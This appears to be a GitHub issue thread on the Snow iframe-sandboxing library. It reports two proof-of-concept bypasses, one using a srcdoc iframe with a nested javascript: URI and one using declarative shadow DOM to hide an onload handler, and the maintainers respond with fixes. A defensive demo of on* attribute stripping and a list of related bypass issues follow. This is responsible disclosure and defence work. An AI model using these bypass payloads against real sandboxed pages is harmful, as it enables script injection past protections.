Comments (3)
Turns out that you don't need a shadow DOM at all for this. Simply:
const f = document.createElement('iframe');
// a srcdoc frame is same-origin with its parent, and the nested frame's javascript: URI
// runs in a document that inherits that origin, so the alert reports the parent's domain
f.srcdoc = '<iframe src="javascript:alert(document.domain)"></iframe>';
document.body.appendChild(f);
Declarative shadow DOM might be a separate issue though, because you can still use it to prevent Snow from stripping onload attributes (#32):
const f = document.createElement('iframe');
// works for both open and closed shadowroot
// ("shadowroot" is the pre-standard attribute name; the standardized form is shadowrootmode="open|closed")
f.srcdoc = `
  <my-element>
    <template id="x" shadowroot="closed">
      <b>In Template & ShadowDOM</b>
      <iframe onload="this.contentWindow.alert.call(top, top.origin)"></iframe>
    </template>
  </my-element>
`;
document.body.appendChild(f);
from snow.
Awesome catch, I honestly have never heard of declarative shadow DOMs before this.
For now the solution would be to block declarative shadow DOMs when they are injected this way; visit #46 to learn more about this decision.
Regarding your other catch which doesn't involve declarative shadow DOMs at all (which is unrelated to this issue), #48 should fix this.
from snow.
If disallowing usage of declarative shadow DOMs the way Snow does (#44 (comment)) prevents your application from running correctly, please share so in this issue thread so we can discuss the problem and understand how to best deal with it.
from snow.
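To make the stripping problem in this thread concrete, here is an added example that is my own and is neither Snow's code nor code posted by the participants. It runs in a browser and places a naive on* stripper that walks only the light DOM next to one that also descends into template contents and open shadow roots, then feeds both the thread's markup (with the alert replaced by a benign handler and the standardized shadowrootmode attribute in place of the older shadowroot name) parsed two ways: through DOMParser, which never attaches declarative shadow roots, and through srcdoc, where the browser's own parser does. The function names stripInlineHandlersNaive and stripInlineHandlersDeep, the payload helper and the fired array are assumptions of the example.

```html
<!doctype html>
<meta charset="utf-8">
<title>on* stripper vs. declarative shadow DOM (added example)</title>
<pre id="log"></pre>
<script>
'use strict';
// Added example, not Snow's code. Uses the standardized attribute
// shadowrootmode="open|closed"; the thread's payload used the earlier name "shadowroot".
const log = (line) => document.getElementById('log').append(line + '\n');

// Removes on* attributes from every element root.querySelectorAll('*') can see.
// This covers the light DOM only: shadow trees and the inert content of
// <template> elements are not descendants of the root.
function stripInlineHandlersNaive(root) {
  let stripped = 0;
  for (const el of root.querySelectorAll('*')) {
    for (const { name } of Array.from(el.attributes)) {
      if (/^on/i.test(name)) { el.removeAttribute(name); stripped++; }
    }
  }
  return stripped;
}

// Same walk, but also descends into template contents and open shadow roots.
// A closed shadow root attached by the parser cannot be reached from script at all.
function stripInlineHandlersDeep(root) {
  let stripped = 0;
  (function visit(node) {
    for (const el of node.querySelectorAll('*')) {
      for (const { name } of Array.from(el.attributes)) {
        if (/^on/i.test(name)) { el.removeAttribute(name); stripped++; }
      }
      // localName rather than instanceof: nodes from a frame belong to another realm
      if (el.localName === 'template') visit(el.content);
      if (el.shadowRoot) visit(el.shadowRoot);
    }
  })(root);
  return stripped;
}

// Constructed payload modelled on the thread's, with the alert swapped for a
// benign handler that records which variant fired in the parent page.
window.fired = [];
const payload = (mode) => `
  <my-element>
    <template shadowrootmode="${mode}">
      <b>In Template &amp; ShadowDOM</b>
      <iframe onload="parent.fired.push('${mode}')"></iframe>
    </template>
  </my-element>`;

// 1. DOMParser (like innerHTML) does not attach declarative shadow roots, so the
//    <template> stays a plain element whose .content holds the onload. The light-DOM
//    walk finds nothing; descending into template content strips it. Cleaning the
//    markup at this stage, before a real document parser sees it, is the only point
//    at which the closed variant can be caught.
for (const mode of ['open', 'closed']) {
  const doc = new DOMParser().parseFromString(payload(mode), 'text/html');
  const naive = stripInlineHandlersNaive(doc);
  const deep = stripInlineHandlersDeep(doc);
  log(`DOMParser/${mode}: naive=${naive} deep=${deep}`);
}

// 2. A srcdoc document is built by the browser's own HTML parser, which attaches
//    declarative shadow roots and removes the <template> from the light DOM. By the
//    time the frame's load event reaches us the nested iframe's onload has already
//    run. With mode=open the shadow tree is still reachable via host.shadowRoot;
//    with mode=closed it is not, so nothing in script can strip the attribute later.
for (const mode of ['open', 'closed']) {
  const frame = document.createElement('iframe');
  frame.srcdoc = payload(mode);
  frame.addEventListener('load', () => {
    const doc = frame.contentDocument;
    const host = doc.querySelector('my-element');
    log(`srcdoc/${mode}: handlerFired=${window.fired.includes(mode)} ` +
        `templateInLightDOM=${host.querySelector('template') !== null} ` +
        `shadowRootReachable=${host.shadowRoot !== null} ` +
        `strippedAfterParse=${stripInlineHandlersDeep(doc)}`);
  });
  document.body.appendChild(frame);
}
</script>
```

Save it as a file and open it in a browser that supports shadowrootmode (current Chromium, Firefox and Safari). The practical lesson it illustrates is the one the maintainers' replies point at: an attribute stripper that runs over a parsed tree can only ever reach the light DOM plus open shadow roots and template contents, so markup that can carry a declarative shadow root has to be refused or cleaned before the document parser runs, not after.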
Related Issues (20)
- Hooks for "addEventListener" and "removeEventListener" are wrongly depending on "this"
- Bypasses via Blob URIs
- Bug in JSON parsing on TikTok caused by Snow
- Custom elements are still vulnerable
- Firefox tests fail to run document.write calls
- Old Snow tests show Snow vulnerability on Firefox
- Firefox does not respect addEventListener calls made with EventTarget of a detached realm
- Snow can be bypassed with document.open('', '', '')
- Snow can be bypassed with window.parent.alert(...)
- Snow can be bypassed with postMessage from iframe by accessing event.source and event.currentTarget
- Snow can be bypassed with ...data: URI
- Snow can be bypassed with frameSet
- documentPictureInPicture bypasses snow
- Demo has insecure implementation
- more javascript uri bypasses with target attr
- Clash when snow protected page opens itself
- Open window, then open iframe seems to bypass Snow
- Bypass with Range.insertNode
- Blob override is not good enough and clashes with whatwg-fetch npm package